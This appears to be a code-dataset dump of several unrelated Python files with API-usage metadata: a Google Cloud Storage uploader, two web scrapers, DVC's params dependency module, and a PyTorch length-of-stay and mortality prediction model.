"line_number": 130,
"usage_type": "call"
},
{
"api_name": "numpy.random.permutation",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 132,
"usage_type": "attribute"
},
{
"api_name": "numpy.argmax",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 138,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "numpy.argsort",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "numpy.repeat",
"line_number": 158,
"usage_type": "call"
}
] |
33708620212
|
import os
from google.cloud import storage
class GoogleStorageLoader():
    def __init__(self) -> None:
        """Start a Google Cloud Storage client - can be used for uploading to storage
        """
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "../content/key-bucket.json"
self.client = storage.Client()
    def upload_to_bucket(self, bucket_name, source_file, destination):
        """Uploads a file to the bucket.
        Args:
            bucket_name (str): name of the target bucket
            source_file (str): path of the local file to upload
            destination (str): destination blob name inside the bucket
        """
bucket = self.client.bucket(bucket_name)
blob = bucket.blob(destination)
blob.upload_from_filename(source_file)
|
IhorLuk/reddit_api_data_ingestion
|
src/storage.py
|
storage.py
|
py
| 724 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "google.cloud.storage.Client",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "google.cloud.storage",
"line_number": 9,
"usage_type": "name"
}
] |
13454184469
|
"""
The words list only contains links and no character data; this file fetches the character list.
"""
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
class Get_chndic_data:
def __init__(self, link):
self.link = link
self.get_data = []
def beautiful_soup(self, link):
"""
        Returns an object of type BeautifulSoup.
        Methods like the following can then be called on the return value:
        data = soup.find('div', id='container').find('div', class_='section_hsk')
        :param link: the {letter_link} path that goes after https://zh.dict.naver.com/
        :return: raw page data
"""
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('headless')
chrome_options.add_argument('window-size=1920x1080')
chrome_options.add_argument("disable-gpu")
# https://beomi.github.io/2017/09/28/HowToMakeWebCrawler-Headless-Chrome/
        # driver = webdriver.Chrome("D:/dev/chromedriver.exe", chrome_options=chrome_options) # chromedriver path at home
        driver = webdriver.Chrome("C:/Users/user/Downloads/chromedriver.exe", chrome_options=chrome_options)
        # chromedriver path at the academy
url = f'https://zh.dict.naver.com/{link}'
driver.get(url)
driver.minimize_window()
content = driver.page_source.encode('utf-8').strip()
soup = BeautifulSoup(content, "html.parser")
driver.close()
return soup
def find_letter_inf(self):
"""
        Using the character link, fetch the character, its meaning, its pinyin and, for words, the component characters and their links
        :return: a list made up of the data above
"""
        # Pinyin still needs to be added.
soup = self.beautiful_soup(self.link)
letter = soup.find('div', id='container').find('div', class_="section section_entry _section_entry") \
.find('div', class_="entry_title _guide_lang").find('strong', class_='word').text
return letter
temp_df = pd.read_csv('../csv/hsk_words_listed.csv', encoding='UTF-8')
hsk_words_link = temp_df.iloc[:, 1]
index = 500
get_data_list = []
########################################## file name conversion ##################################
for i in range(3000, 3100):
while True:
try:
get_data = Get_chndic_data(hsk_words_link[i])
get_data_list.append(get_data.find_letter_inf())
df = pd.DataFrame(get_data_list)
print(df.tail())
df.to_csv(f'../csv/letters_list{3000}.csv')
break
except AttributeError:
print('try again')
continue
|
i-hs/chn_words_crawling
|
make_database/words_list.py
|
words_list.py
|
py
| 2,691 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 64,
"usage_type": "call"
}
] |
42072257921
|
#!/usr/bin/env python
# coding: utf-8
# In[36]:
import requests
from bs4 import BeautifulSoup
import pandas
list1=[]
for page in range(0,30,10):
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="+str(page)+".html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c= r.content
soup=BeautifulSoup(c,"html.parser")
all=soup.find_all("div",{"class":"propertyRow"})
x=all[0].find("h4",{"class":"propPrice"}).text
for item in all:
d={}
d["Address"]=item.find_all("span",{"class":"propAddressCollapse"})[0].text
try:
d["Locality"]=item.find_all("span",{"class":"propAddressCollapse"})[1].text
except:
d["Locality"]=None
d["Price"]=item.find("h4",{"class":"propPrice"}).text.replace("\n","").strip()
try:
d["Beds"]=item.find("span",{"class":"infoBed"}).find("b").text
except:
d["Beds"]=None
try:
d["Area"]=item.find("span",{"class":"infoSqFt"}).find("b").text
except:
d["Area"]=None
try:
d["Full Baths"]=item.find("span",{"class":"infoValueFullBath"}).find("b").text
except:
d["Full Baths"]=None
try:
d["Half Baths"]=item.find("span",{"class":"infoValueHalfBath"}).find("b").text
except:
d["Half Baths"]=None
for column_group in item.find_all("div",{"class":"columnGroup"}):
for fg , fn in zip(column_group.find_all("span",{"class":"featureGroup"}),column_group.find_all("span",{"class":"featureName"})):
if "Lot Size" in fg.text :
d["Lot Size"]=fn.text
list1.append(d)
df=pandas.DataFrame(list1)
df.to_csv("output.csv")
|
shivangijain827/python-projects
|
web - scraper/main.py
|
main.py
|
py
| 1,883 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 63,
"usage_type": "call"
}
] |
3477283820
|
import logging
import os
import typing
from collections import defaultdict
from typing import Dict
import dpath.util
from voluptuous import Any
from dvc.exceptions import DvcException
from dvc.utils.serialize import ParseError, load_path
from dvc_data.hashfile.hash_info import HashInfo
from .base import Dependency
logger = logging.getLogger(__name__)
class MissingParamsError(DvcException):
pass
class MissingParamsFile(DvcException):
pass
class ParamsIsADirectoryError(DvcException):
pass
class BadParamFileError(DvcException):
pass
class ParamsDependency(Dependency):
PARAM_PARAMS = "params"
PARAM_SCHEMA = {PARAM_PARAMS: Any(dict, list, None)}
DEFAULT_PARAMS_FILE = "params.yaml"
def __init__(self, stage, path, params=None, repo=None):
self.params = list(params) if params else []
info = (
{self.PARAM_PARAMS: params} if isinstance(params, dict) else None
)
repo = repo or stage.repo
path = path or os.path.join(repo.root_dir, self.DEFAULT_PARAMS_FILE)
super().__init__(stage, path, info=info, repo=repo)
def dumpd(self):
ret = super().dumpd()
if not self.hash_info:
ret[self.PARAM_PARAMS] = self.params or {}
return ret
def fill_values(self, values=None):
"""Load params values dynamically."""
if values is None:
return
info = {}
if not self.params:
info.update(values)
for param in self.params:
if param in values:
info[param] = values[param]
self.hash_info = HashInfo(self.PARAM_PARAMS, info)
def read_params(
self, flatten: bool = True, **kwargs: typing.Any
) -> Dict[str, typing.Any]:
try:
config = self.read_file()
except MissingParamsFile:
config = {}
if not self.params:
return config
ret = {}
if flatten:
for param in self.params:
try:
ret[param] = dpath.util.get(config, param, separator=".")
except KeyError:
continue
return ret
from dpath.util import merge
for param in self.params:
merge(
ret,
dpath.util.search(config, param, separator="."),
separator=".",
)
return ret
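    # Example (illustrative): for a params.yaml containing {"train": {"lr": 0.1}} and
    # self.params == ["train.lr"], flatten=True returns {"train.lr": 0.1}, while
    # flatten=False returns the nested form {"train": {"lr": 0.1}}.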
def workspace_status(self):
if not self.exists:
return {str(self): "deleted"}
if self.hash_info.value is None:
return {str(self): "new"}
from funcy import ldistinct
status = defaultdict(dict)
info = self.hash_info.value if self.hash_info else {}
actual = self.read_params()
# NOTE: we want to preserve the order of params as specified in the
# status. In case of tracking the whole file, the order is top-level
# keys in the file and then the keys in the `info` from `dvc.lock`
# (which are alphabetically sorted).
params = self.params or ldistinct([*actual.keys(), *info.keys()])
for param in params:
if param not in actual:
st = "deleted"
elif param not in info:
st = "new"
elif actual[param] != info[param]:
st = "modified"
else:
assert actual[param] == info[param]
continue
status[str(self)][param] = st
return status
def status(self):
return self.workspace_status()
def validate_filepath(self):
if not self.exists:
raise MissingParamsFile(f"Parameters file '{self}' does not exist")
if self.isdir():
raise ParamsIsADirectoryError(
f"'{self}' is a directory, expected a parameters file"
)
def read_file(self):
self.validate_filepath()
try:
return load_path(self.fs_path, self.repo.fs)
except ParseError as exc:
raise BadParamFileError(
f"Unable to read parameters from '{self}'"
) from exc
def get_hash(self):
info = self.read_params()
missing_params = set(self.params) - set(info.keys())
if missing_params:
raise MissingParamsError(
"Parameters '{}' are missing from '{}'.".format(
", ".join(missing_params), self
)
)
return HashInfo(self.PARAM_PARAMS, info)
def save(self):
if not self.exists:
raise self.DoesNotExistError(self)
if not self.isfile and not self.isdir:
raise self.IsNotFileOrDirError(self)
self.ignore()
self.hash_info = self.get_hash()
|
gshanko125298/Prompt-Engineering-In-context-learning-with-GPT-3-and-LLMs
|
myenve/Lib/site-packages/dvc/dependency/param.py
|
param.py
|
py
| 4,814 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "base.Dependency",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "voluptuous.Any",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "dvc_data.hashfile.hash_info.HashInfo",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "typing.Any",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "dpath.util.util.get",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "dpath.util.util",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "dpath.util",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "dpath.util.merge",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "dpath.util.util.search",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "dpath.util.util",
"line_number": 93,
"usage_type": "attribute"
},
{
"api_name": "dpath.util",
"line_number": 93,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "collections.defaultdict",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "funcy.ldistinct",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "dvc.utils.serialize.load_path",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "dvc.utils.serialize.ParseError",
"line_number": 145,
"usage_type": "name"
},
{
"api_name": "dvc_data.hashfile.hash_info.HashInfo",
"line_number": 161,
"usage_type": "call"
}
] |
8585416211
|
import torch
import torch.nn as nn
from torch import cat, exp
import torch.nn.functional as F
from torch.nn.functional import pad
from torch.nn.modules.batchnorm import _BatchNorm
class my_AFF(nn.Module):
'''
Point-wise Convolution based Attention module (PWAtt)
'''
def __init__(self, channels=64, r=2):
super(my_AFF, self).__init__()
inter_channels = int(channels // r)
self.local_att = nn.Sequential(
nn.Conv1d(in_channels=channels, out_channels=inter_channels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm1d(inter_channels),
nn.ReLU(inplace=True),
nn.Conv1d(in_channels=inter_channels, out_channels=channels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm1d(channels),
)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
xa = self.local_att(x)
wei = self.sigmoid(xa)
xo = 2 * x * wei
return xo, wei
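# Shape sketch for the module above (illustrative): with x of shape (B, C, T) = (4, 64, 48),
# local_att applies two point-wise (kernel_size=1) Conv1d layers and returns weights wei of
# the same shape, so the output 2 * x * wei is again (4, 64, 48).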
# Root Mean Squared Logarithmic Error (RMSLE) loss
class RMSLELoss(nn.Module):
def __init__(self, eps=1e-6):
super(RMSLELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
self.eps = eps
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the log(predictions) corresponding to no data should be set to 0
# log_y_hat = y_hat.log().where(mask, torch.zeros_like(y))
log_y_hat = torch.log(y_hat + 1).where(mask, torch.zeros_like(y))
        # then we set the log(labels) that correspond to no data to be 0 as well
# log_y = y.log().where(mask, torch.zeros_like(y))
log_y = torch.log(y + 1).where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(log_y_hat, log_y)
rmsle_loss = torch.sqrt(loss + self.eps)
loss = torch.sum(rmsle_loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
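# In effect the loss above computes, per sequence, sum_t sqrt((log(y_hat+1) - log(y+1))^2 + eps)
# over valid (masked) timesteps only, divides by the clamped sequence length unless sum_losses
# is set, and then averages over the batch.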
# Root Mean Squared Error (RMSE) loss
class RMSELoss(nn.Module):
def __init__(self, eps=1e-6):
super(RMSELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
self.eps = eps
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the predictions corresponding to no data should be set to 0
y_hat = y_hat.where(mask, torch.zeros_like(y))
        # then we set the labels that correspond to no data to be 0 as well
y = y.where(mask, torch.zeros_like(y))
        # where there is no data y_hat = y = 0, so the squared error will be 0 in these places
loss = self.squared_error(y_hat, y)
rmse_loss = torch.sqrt(loss + self.eps)
loss = torch.sum(rmse_loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
# Mean Squared Logarithmic Error (MSLE) loss
class MSLELoss(nn.Module):
def __init__(self):
super(MSLELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the log(predictions) corresponding to no data should be set to 0
log_y_hat = y_hat.log().where(mask, torch.zeros_like(y))
        # then we set the log(labels) that correspond to no data to be 0 as well
log_y = y.log().where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(log_y_hat, log_y)
loss = torch.sum(loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
# Mean Squared Error (MSE) loss
class MSELoss(nn.Module):
def __init__(self):
super(MSELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the predictions corresponding to no data should be set to 0
y_hat = y_hat.where(mask, torch.zeros_like(y))
        # then we set the labels that correspond to no data to be 0 as well
y = y.where(mask, torch.zeros_like(y))
        # where there is no data y_hat = y = 0, so the squared error will be 0 in these places
loss = self.squared_error(y_hat, y)
loss = torch.sum(loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
class MyBatchNorm(_BatchNorm):
def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True):
super(MyBatchNorm, self).__init__(
num_features, eps, momentum, affine, track_running_stats)
def forward(self, input):
self._check_input_dim(input)
# hack to work around model.eval() issue
if not self.training:
self.eval_momentum = 0 # set the momentum to zero when the model is validating
if self.momentum is None:
exponential_average_factor = 0.0
else:
exponential_average_factor = self.momentum if self.training else self.eval_momentum
if self.track_running_stats:
if self.num_batches_tracked is not None:
self.num_batches_tracked = self.num_batches_tracked + 1
if self.momentum is None: # use cumulative moving average
exponential_average_factor = 1.0 / float(self.num_batches_tracked)
else: # use exponential moving average
exponential_average_factor = self.momentum if self.training else self.eval_momentum
return F.batch_norm(
input, self.running_mean, self.running_var, self.weight, self.bias,
training=True, momentum=exponential_average_factor, eps=self.eps) # set training to True so it calculates the norm of the batch
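# Design note on the class above: F.batch_norm is always called with training=True, so the
# statistics of the current batch are used for normalisation even in eval mode, while
# exponential_average_factor is forced to 0 during evaluation so that running_mean and
# running_var are not updated by validation batches.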
class MyBatchNorm1d(MyBatchNorm):
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'.format(input.dim()))
class EmptyModule(nn.Module):
def forward(self, X):
return X
class TempSepConv_CAFF(nn.Module):
def __init__(self, config, no_ts_features=None, no_daig_features=None, no_flat_features=None):
super(TempSepConv_CAFF, self).__init__()
self.task = config['task']
self.n_layers = config['n_layers']
self.diagnosis_size = config['diagnosis_size']
self.main_dropout_rate = config['main_dropout_rate']
self.temp_dropout_rate = config['temp_dropout_rate']
self.kernel_size = config['kernel_size']
self.temp_kernels = config['temp_kernels']
self.last_linear_size = config['last_linear_size']
self.no_ts_features = no_ts_features
self.no_daig_features = no_daig_features
self.no_flat_features = no_flat_features
self.no_diag = config['no_diag']
self.alpha = 100
self.keep_prob = 1-config['main_dropout_rate'] #0.5
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.hardtanh = nn.Hardtanh(min_val=1/48, max_val=100) # keep the end predictions between half an hour and 100 days
self.rmsle_loss = RMSLELoss()
self.msle_loss = MSLELoss()
self.mse_loss = MSELoss()
self.bce_loss = nn.BCELoss()
self.main_dropout = nn.Dropout(p=self.main_dropout_rate)
self.temp_dropout = nn.Dropout(p=self.temp_dropout_rate)
self.remove_none = lambda x: tuple(xi for xi in x if xi is not None) # removes None items from a tuple
self.empty_module = EmptyModule()
self.batchnormclass = MyBatchNorm1d
# self.batchnormclass = nn.BatchNorm1d
self.diagnosis_encoder = nn.Linear(in_features=self.no_daig_features, out_features=self.diagnosis_size)
self.diagnosis_encoder1 = nn.Linear(in_features=self.no_daig_features, out_features=self.temp_kernels[0]+1)
self.flat_encoder = nn.Linear(in_features=self.no_flat_features, out_features=self.temp_kernels[0]+1)
self.bn_diagnosis_encoder = self.batchnormclass(num_features=self.diagnosis_size, momentum=0.1) # input shape: B * diagnosis_size
self.bn_point_last_los = self.batchnormclass(num_features=self.last_linear_size, momentum=0.1) # input shape: (B * T) * last_linear_size
self.bn_point_last_mort = self.batchnormclass(num_features=self.last_linear_size, momentum=0.1) # input shape: (B * T) * last_linear_size
# self.bn_diagnosis_encoder = self.empty_module
# self.bn_point_last_los = self.empty_module
# self.bn_point_last_mort = self.empty_module
# input shape: (B * T) * last_linear_size
# output shape: (B * T) * 1
self.final_los = nn.Linear(in_features=self.last_linear_size, out_features=1)
self.final_mort = nn.Linear(in_features=self.last_linear_size, out_features=1)
# TDSC layers settings
self.layers = []
for i in range(self.n_layers):
dilation = i * (self.kernel_size - 1) if i > 0 else 1 # dilation = 1 for the first layer, after that it captures all the information gathered by previous layers
temp_k = self.temp_kernels[i]
self.layers.append({})
if temp_k is not None:
padding = [(self.kernel_size - 1) * dilation, 0] # [padding_left, padding_right]
self.layers[i]['temp_kernels'] = temp_k
self.layers[i]['dilation'] = dilation
self.layers[i]['padding'] = padding
self.layers[i]['stride'] = 1
self.layer_modules = nn.ModuleDict()
self.Y = 0 # Y is the number of channels in the previous temporal layer (could be 0 if this is the first layer)
self.n = 0 # n is the layer number
for i in range(self.n_layers):
temp_in_channels = (self.no_ts_features + self.n) * (1 + self.Y) if i > 0 else 2 * self.no_ts_features # (F + n) * (Y + 1)
temp_out_channels = (self.no_ts_features + self.n) * self.layers[i]['temp_kernels'] # (F + n) * temp_kernels
out_channels_caff = (self.no_ts_features+self.n+1)*(self.layers[i]['temp_kernels']+1)
if self.n == 0:
linear_input_dim = (self.no_ts_features + self.n - 1) * self.Y + 2 * self.no_ts_features + 2 + self.no_flat_features
else:
linear_input_dim = (self.no_ts_features + self.n - 1) * self.Y + (self.layers[i]['temp_kernels']+1) + 2 * self.no_ts_features + 2 + self.no_flat_features # (F + n-1) * Y + Z + 2F + 2 + no_flat_features
linear_output_dim = (self.layers[i]['temp_kernels']+1)
temp = nn.Conv1d(in_channels=temp_in_channels, # (F + n) * (Y + 1)
out_channels=temp_out_channels, # (F + n) * Y
kernel_size=self.kernel_size,
stride=self.layers[i]['stride'],
dilation=self.layers[i]['dilation'],
groups=self.no_ts_features + self.n)
caff_fc = nn.Linear(in_features=linear_input_dim, out_features=linear_output_dim)
bn_temp = self.batchnormclass(num_features=temp_out_channels, momentum=0.1)
bn_caff = self.batchnormclass(num_features=linear_output_dim, momentum=0.1)
# bn_temp = bn_point = self.empty_module # linear module; does nothing
A_layer = my_AFF(out_channels_caff)
FFA_layer = my_AFF(linear_input_dim)
self.layer_modules[str(i)] = nn.ModuleDict({
'temp': temp,
'bn_temp': bn_temp,
'caff_fc': caff_fc,
'bn_caff': bn_caff,
'A_layer': A_layer,
'FFA_layer': FFA_layer})
self.Y = self.layers[i]['temp_kernels']
self.n += 1
# input shape: (B * T) * ((F + n) * (1 + Y) + diagnosis_size + no_flat_features)
# output shape: (B * T) * last_linear_size
# input_size = (self.no_ts_features + self.n) * (1 + self.Y) + self.diagnosis_size + self.no_flat_features
#input_size = (self.no_ts_features + self.n) * (1 + self.Y) + self.diagnosis_size + self.no_flat_features
input_size = (self.no_ts_features + self.n) * (1 + self.Y) + (self.n_layers * (1 + self.Y)) + self.diagnosis_size + self.no_flat_features
if self.no_diag:
# input_size = input_size - self.diagnosis_size
input_size = input_size - self.diagnosis_size #input_size - self.diagnosis_size
self.last_los_fc = nn.Linear(in_features=input_size, out_features=self.last_linear_size)
self.last_mort_fc = nn.Linear(in_features=input_size, out_features=self.last_linear_size)
return
def tdsc_caff(self, B=None, T=None, X=None, repeat_flat=None, X_orig=None, temp=None, bn_temp=None, caff_fc=None,
bn_caff=None, A_layer=None, FFA_layer=None, temp_kernels=None, padding=None, prev_temp=None, prev_caff=None, m_scale_output=None,
caff_skip=None):
X_padded = pad(X, padding, 'constant', 0) # B * ((F + n) * (Y + 1)) * (T + padding)
X_temp = self.temp_dropout(bn_temp(temp(X_padded))) # B * ((F + n) * temp_kernels) * T
#### Context Aware Attentive Feature Fusion (CAFF) #####
if prev_caff is None:
X_concat = cat(self.remove_none((prev_temp, # (B * T) * ((F + n-1) * Y)
prev_caff, # (B * T) * 1
X_orig, # (B * T) * (2F + 2)
repeat_flat)), # (B * T) * no_flat_features
dim=1) # (B * T) * (((F + n-1) * Y) + 1 + 2F + 2 + no_flat_features)
else:
X_concat = cat(self.remove_none((prev_temp.view(B*T,-1), # (B * T) * ((F + n-1) * Y)
prev_caff.permute(0,3,1,2).view(B*T,-1), # (B * T) * 1
X_orig, # (B * T) * (2F + 2)
repeat_flat)), # (B * T) * no_flat_features
dim=1) # (B * T) * (((F + n-1) * Y) + 1 + 2F + 2 + no_flat_features)
X_concat, wei_1 = FFA_layer(X_concat.view(B,T,-1).permute(0,2,1)) # Step 2 Attention
X_concat = X_concat.permute(0,2,1).view(B*T,-1)
caff_output = self.main_dropout(bn_caff(caff_fc(X_concat))) # (B * T) * 1
caff_output = caff_output.view(B, T, -1).unsqueeze(2).permute(0,2,3,1)
# Accumulate multi-scale features
m_scale_output = cat((m_scale_output,caff_output), dim=1) if m_scale_output is not None else caff_output
caff_skip = cat((caff_skip, prev_caff[:,:,-1,:].unsqueeze(2)), dim=1) if prev_caff is not None else caff_skip
temp_skip = cat((caff_skip, # B * (F + n) * 1 * T
X_temp.view(B, caff_skip.shape[1], temp_kernels, T)), # B * (F + n) * temp_kernels * T
dim=2) # B * (F + n) * (1 + temp_kernels) * T
X_combined = self.relu(cat((temp_skip, caff_output), dim=1)) # B * (F + n) * (1 + temp_kernels) * T
next_X = X_combined.view(B, (caff_skip.shape[1] + 1) * (1 + temp_kernels), T) # B * ((F + n + 1) * (1 + temp_kernels)) * T
next_X, wei_2 = A_layer(next_X.view(B,-1,T)) # step 4 attention
next_X = next_X.view(B, (caff_skip.shape[1] + 1) * (1 + temp_kernels), T)
temp_output = X_temp.permute(0, 2, 1).contiguous().view(B * T, caff_skip.shape[1] * temp_kernels) # (B * T) * ((F + n) * temp_kernels)
return (temp_output, # (B * T) * ((F + n) * temp_kernels)
caff_output, # (B * T) * 1
next_X, # B * ((F + n) * (1 + temp_kernels)) * T
caff_skip, # caff features of the prevous layer
m_scale_output, # keeping track of the caff multi scale features from all layers; B * (F + n) * T
wei_1, wei_2) # PWatt Attention weights
def forward(self, X, diagnoses, flat, time_before_pred=5):
# flat is B * no_flat_features
# diagnoses is B * no_daig_features
# X is B * no_daig_features * T
# split into features and indicator variables
X_separated = torch.split(X[:, 1:-1, :], self.no_ts_features, dim=1) # tuple ((B * F * T), (B * F * T))
# prepare repeat arguments and initialise layer loop
B, _, T = X_separated[0].shape
repeat_flat = flat.repeat_interleave(T, dim=0) # (B * T) * no_flat_features
X_orig = X.permute(0, 2, 1).contiguous().view(B * T, 2 * self.no_ts_features + 2) # (B * T) * (2F + 2)
repeat_args = {'repeat_flat': repeat_flat,
'X_orig': X_orig,
'B': B,
'T': T}
next_X = torch.stack(X_separated, dim=2).reshape(B, 2 * self.no_ts_features, T)
caff_skip = X_separated[0].unsqueeze(2) # ts features without indicators, keeps track of caff skip connections generated from caff module;
temp_output = None
caff_output = None
m_scale_output = None
wei_step2 = []
wei_step4 = []
for i in range(self.n_layers):
kwargs = dict(self.layer_modules[str(i)], **repeat_args)
temp_output, caff_output, next_X, caff_skip, m_scale_output, wei_1, wei_2 = self.tdsc_caff(X=next_X, caff_skip=caff_skip,
prev_temp=temp_output, prev_caff=caff_output,
temp_kernels=self.layers[i]['temp_kernels'],
padding=self.layers[i]['padding'],
m_scale_output= m_scale_output,
**kwargs)
wei_step2.append(wei_1.detach().cpu())
wei_step4.append(wei_2.detach().cpu())
m_scale_output = m_scale_output.view(B,-1,T)
if self.no_diag:
combined_features = cat((flat.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * no_flat_features
next_X[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1),
m_scale_output[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1)), dim=1) # (B * (T - time_before_pred)) * (((F + n) * (1 + Y)) + no_flat_features) for tpc
else:
diagnoses_enc = self.relu(self.main_dropout(self.bn_diagnosis_encoder(self.diagnosis_encoder(diagnoses)))) # B * diagnosis_size
combined_features = cat((flat.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * no_flat_features
diagnoses_enc.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * diagnosis_size
next_X[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1),
m_scale_output[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1)), dim=1) # (B * (T - time_before_pred)) * (((F + n) * (1 + Y)) + diagnosis_size + no_flat_features) for tpc
last_los = self.relu(self.main_dropout(self.bn_point_last_los(self.last_los_fc(combined_features))))
last_mort = self.relu(self.main_dropout(self.bn_point_last_mort(self.last_mort_fc(combined_features))))
los_predictions = self.hardtanh(exp(self.final_los(last_los).view(B, T - time_before_pred))) # B * (T - time_before_pred)
mort_predictions = self.sigmoid(self.final_mort(last_mort).view(B, T - time_before_pred)) # B * (T - time_before_pred)
return los_predictions, mort_predictions, wei_step2, wei_step4
def loss(self, y_hat_los, y_hat_mort, y_los, y_mort, mask, seq_lengths, device, sum_losses, loss_type):
# mortality loss
if self.task == 'mortality':
loss = self.bce_loss(y_hat_mort, y_mort) * self.alpha
# LoS loss
else:
bool_type = torch.cuda.BoolTensor if device == torch.device('cuda:3') else torch.BoolTensor
if loss_type == 'rmsle':
los_loss = self.rmsle_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
            elif loss_type == 'msle':
los_loss = self.msle_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
elif loss_type == 'mse':
los_loss = self.mse_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
loss = los_loss
return loss
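# A minimal, hypothetical training-step sketch for the network above. It relies only on the
# forward() and loss() signatures defined in this file; the optimiser choice, learning rate,
# device and 'msle' loss_type are illustrative assumptions, and `model`, the input tensors
# and the targets are presumed to already exist with the shapes documented in forward()/loss().
#
#   optimiser = torch.optim.Adam(model.parameters(), lr=1e-3)
#   los_hat, mort_hat, wei_step2, wei_step4 = model(X, diagnoses, flat)
#   loss = model.loss(los_hat, mort_hat, y_los, y_mort, mask, seq_lengths,
#                     device=torch.device('cpu'), sum_losses=True, loss_type='msle')
#   optimiser.zero_grad()
#   loss.backward()
#   optimiser.step()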
|
Al-Dailami/DTSC-CAFF
|
dtsc_caff_model.py
|
dtsc_caff_model.py
|
py
| 21,192 |
python
|
en
|
code
| 1 |
github-code
